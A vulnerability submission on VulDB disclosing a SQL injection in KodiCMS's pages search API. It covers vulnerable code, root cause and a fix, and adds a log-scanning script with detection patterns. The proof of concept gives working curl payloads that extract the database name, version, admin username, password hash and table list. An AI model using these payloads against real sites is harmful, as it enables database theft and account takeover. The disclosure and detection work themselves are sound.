Submission #718289: KodiCMS https://github.com/KodiCMS-Kohana/cms 13.82.135 SQL Injection

Information

Title: KodiCMS https://github.com/KodiCMS-Kohana/cms 13.82.135 SQL Injection
Description:

# SQL Injection Vulnerability in KodiCMS ≤ 13.82.135

**BUG_Author:** Security Researcher
**Affected Version:** KodiCMS ≤ 13.82.135 (all versions)
**Vendor:** [KodiCMS-Kohana GitHub Repository](https://github.com/KodiCMS-Kohana/cms)
**Software:** [KodiCMS](https://github.com/KodiCMS-Kohana/cms)
**Vulnerability Type:** SQL Injection (Error-based)
**Vulnerability Files:**
- `cms/modules/pages/classes/kodicms/model/page.php` (Line 535)
- `cms/modules/tags/classes/kodicms/model/tag.php` (Line 29)

---

## Description

A SQL Injection vulnerability exists in KodiCMS, a content management system based on the Kohana framework. The vulnerability is located in the `like()` function of the `Model_Page` class, which improperly uses `DB::expr()` to handle user-supplied input without proper sanitization.

### Vulnerable Code

In the file `cms/modules/pages/classes/kodicms/model/page.php`, lines 525-535:

```php
public function like($keyword)
{
    return $this
        ->where_open()
            ->or_where(DB::expr('LOWER(title)'), 'like', '%:query%')
            ->or_where('slug', 'like', '%:query%')
            ->or_where('breadcrumb', 'like', '%:query%')
            ->or_where('meta_title', 'like', '%:query%')
            ->or_where('meta_keywords', 'like', '%:query%')
        ->where_close()
        ->param(':query', DB::expr($keyword)); // VULNERABLE: user input passed directly to DB::expr()
}
```

### Root Cause

The `DB::expr()` function in the Kohana framework is designed to create raw, unescaped SQL expressions. According to Kohana's documentation: "A database expression is taken as direct input and no escaping is performed."

The developer incorrectly passed user-controlled input (`$keyword`) directly to `DB::expr()`, bypassing all SQL escaping mechanisms and allowing attackers to inject arbitrary SQL code.

### Attack Vector

1. An authenticated user or anyone with a valid API key can access the pages search API endpoint.
2. The search parameter is passed to the `like()` function without sanitization.
3. By crafting malicious SQL payloads, an attacker can extract sensitive data from the database using error-based SQL injection techniques.

---

## Affected Endpoint

**API Endpoint:** `/backend/api-pages.search`
**HTTP Method:** GET
**Required Parameters:**
- `api_key` - Valid API key (or authenticated session)
- `search` - Search query (vulnerable parameter)

**Vulnerable Code Path:**

```
User Input → Controller_API_Pages::get_search() → Model_Page::like($query) → DB::expr($keyword) → SQL Execution
```

---

## Proof of Concept

### Prerequisites

- KodiCMS installed and running
- Valid API key or authenticated session
- API mode enabled (`api.mode = 'yes'` in config)

### Step 1: Verify Normal Search Functionality

```bash
curl -s "http://<target-ip>/backend/api-pages.search?api_key=<API_KEY>&search=test"
```

Expected Response: Empty or matching pages list.

### Step 2: Test SQL Injection (Boolean-based)

```bash
curl -s "http://<target-ip>/backend/api-pages.search?api_key=<API_KEY>&search=%27%20OR%20%271%27%3D%271"
```

**Payload (decoded):** `' OR '1'='1`

Expected Response: All pages returned (bypassing search condition).

### Step 3: Extract Database Name (Error-based)

```bash
curl -s "http://<target-ip>/backend/api-pages.search?api_key=<API_KEY>&search=%27)%20AND%20EXTRACTVALUE(1,CONCAT(0x7e,(SELECT%20database())))%23"
```

**Payload (decoded):** `') AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT database())))#`

Expected Response:

```json
{"code":1105,"message":"XPATH syntax error: '~kodicms'..."}
```

### Step 4: Extract MySQL Version

```bash
curl -s "http://<target-ip>/backend/api-pages.search?api_key=<API_KEY>&search=%27)%20AND%20EXTRACTVALUE(1,CONCAT(0x7e,(SELECT%20version())))%23"
```

**Payload (decoded):** `') AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT version())))#`

Expected Response:

```json
{"code":1105,"message":"XPATH syntax error: '~5.7.44'..."}
```

### Step 5: Extract Admin Username

```bash
curl -s "http://<target-ip>/backend/api-pages.search?api_key=<API_KEY>&search=%27)%20AND%20EXTRACTVALUE(1,CONCAT(0x7e,(SELECT%20username%20FROM%20users%20LIMIT%201)))%23"
```

**Payload (decoded):** `') AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT username FROM users LIMIT 1)))#`

Expected Response:

```json
{"code":1105,"message":"XPATH syntax error: '~admin'..."}
```

### Step 6: Extract Admin Password Hash

```bash
curl -s "http://<target-ip>/backend/api-pages.search?api_key=<API_KEY>&search=%27)%20AND%20EXTRACTVALUE(1,CONCAT(0x7e,(SELECT%20password%20FROM%20users%20LIMIT%201)))%23"
```

**Payload (decoded):** `') AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT password FROM users LIMIT 1)))#`

Expected Response:

```json
{"code":1105,"message":"XPATH syntax error: '~bf8e46d9d102cf1f7e674aebd7321f2'..."}
```

Note: Due to the EXTRACTVALUE length limitation, use SUBSTRING to extract the full hash:

```bash
curl -s "http://<target-ip>/backend/api-pages.search?api_key=<API_KEY>&search=%27)%20AND%20EXTRACTVALUE(1,CONCAT(0x7e,(SELECT%20SUBSTRING(password,32,32)%20FROM%20users%20LIMIT%201)))%23"
```

### Step 7: Extract All Table Names

```bash
curl -s "http://<target-ip>/backend/api-pages.search?api_key=<API_KEY>&search=%27)%20AND%20EXTRACTVALUE(1,CONCAT(0x7e,(SELECT%20GROUP_CONCAT(table_name)%20FROM%20information_schema.tables%20WHERE%20table_schema%3Ddatabase())))%23"
```

---

## Impact

An attacker exploiting this vulnerability can:

1. **Data Exfiltration:** Extract sensitive data from the entire database including user credentials, API keys, page content, and configuration settings.
2. **Authentication Bypass:** Retrieve admin password hashes which can be cracked offline to gain administrative access.
3. **Information Disclosure:** Enumerate database structure, table names, and column names for further attacks.
4. **Potential Remote Code Execution:** In certain MySQL configurations, SQL injection can lead to file read/write operations or command execution.

---

## Remediation

### Recommended Fix

Replace the vulnerable code in `cms/modules/pages/classes/kodicms/model/page.php`:

**Before (Vulnerable):**

```php
->param(':query', DB::expr($keyword));
```

**After (Fixed):**

```php
->param(':query', strtolower($keyword));
```

### Additional Recommendations

1. Remove the `DB::expr()` wrapper from user-controlled input in all locations.
2. Implement input validation and sanitization for all user inputs.
3. Use parameterized queries consistently throughout the application.
4. Apply the principle of least privilege for database accounts.
5. Enable Web Application Firewall (WAF) rules to detect SQL injection attempts.

---

## Timeline

- **Discovery Date:** 2025-12-17
- **Vendor Notification:** Pending
- **Public Disclosure:** Pending

---

## References

- [Kohana DB::expr() Documentation](https://kohanaframework.org/3.3/guide/database/query/builder#database-expressions)
- [OWASP SQL Injection](https://owasp.org/www-community/attacks/SQL_Injection)
- [CWE-89: SQL Injection](https://cwe.mitre.org/data/definitions/89.html)
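For defenders who cannot patch immediately, the advisory's endpoint and payload shape are easy to watch for in web server access logs. The following is an added example, not part of the advisory or the KodiCMS project: it parses constructed Apache-style log lines (not real traffic), pulls the `search` parameter out of requests to `/backend/api-pages.search`, URL-decodes it, and flags the indicators used by the proof of concept (tautologies, error-based functions such as EXTRACTVALUE/CONCAT, subselects, `information_schema`, quote-plus-comment suffixes). The indicator names and the log format are assumptions for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample log lines (Apache combined format); not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [18/Dec/2025:03:20:01 +0000] "GET /backend/api-pages.search?api_key=REDACTED&search=test HTTP/1.1" 200 17 "-" "curl/8.4.0"
10.0.0.5 - - [18/Dec/2025:03:20:07 +0000] "GET /backend/api-pages.search?api_key=REDACTED&search=%27%20OR%20%271%27%3D%271 HTTP/1.1" 200 5120 "-" "curl/8.4.0"
10.0.0.5 - - [18/Dec/2025:03:20:12 +0000] "GET /backend/api-pages.search?api_key=REDACTED&search=%27)%20AND%20EXTRACTVALUE(1,CONCAT(0x7e,(SELECT%20database())))%23 HTTP/1.1" 200 64 "-" "curl/8.4.0"
10.0.0.9 - - [18/Dec/2025:03:21:00 +0000] "GET /backend/index HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Indicator names are assumed for this example; patterns mirror the PoC payloads.
INDICATORS = [
    ("sql-function-in-search", re.compile(r"\b(EXTRACTVALUE|UPDATEXML|CONCAT|GROUP_CONCAT|SUBSTRING)\s*\(", re.I)),
    ("subselect", re.compile(r"\bSELECT\b.*\bFROM\b|\bSELECT\s+(database|version)\s*\(", re.I)),
    ("schema-enumeration", re.compile(r"information_schema", re.I)),
    ("tautology", re.compile(r"'\s*OR\s*'[^']*'\s*=\s*'", re.I)),
    ("quote-and-comment", re.compile(r"'.*(#|--)\s*$")),
]

def extract_search_param(target):
    """Return the decoded `search` value for requests to the vulnerable endpoint, else None."""
    parts = urlsplit(target)
    if parts.path != "/backend/api-pages.search":
        return None
    values = parse_qs(parts.query).get("search")
    if not values:
        return None
    # parse_qs decoded once; decode again so double-encoded payloads are inspected in final form.
    return unquote(values[0])

def scan_log(text):
    """Return (line_no, decoded_search, [indicator names]) for each suspicious request."""
    hits = []
    for line_no, line in enumerate(text.splitlines(), 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        search = extract_search_param(m.group("target"))
        if search is None:
            continue
        reasons = [name for name, rx in INDICATORS if rx.search(search)]
        if reasons:
            hits.append((line_no, search, reasons))
    return hits

if __name__ == "__main__":
    for line_no, search, reasons in scan_log(SAMPLE_LOG):
        print(f"line {line_no}: {reasons} <- {search!r}")
```

Pair this with alerting on MySQL error 1105 ("XPATH syntax error") in the application's response logs, since that error text is what the error-based technique relies on.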
User: hiro (UID 93548)
Submitted: 18/12/2025 03:24 AM (6 months ago)
Moderation: 31/12/2025 10:17 AM (13 days later)
Status: Approved
VulDB Entry: 339161 [Kohana KodiCMS up to 13.82.135 Search API Endpoint page.php like keyword sql injection]
Points: 17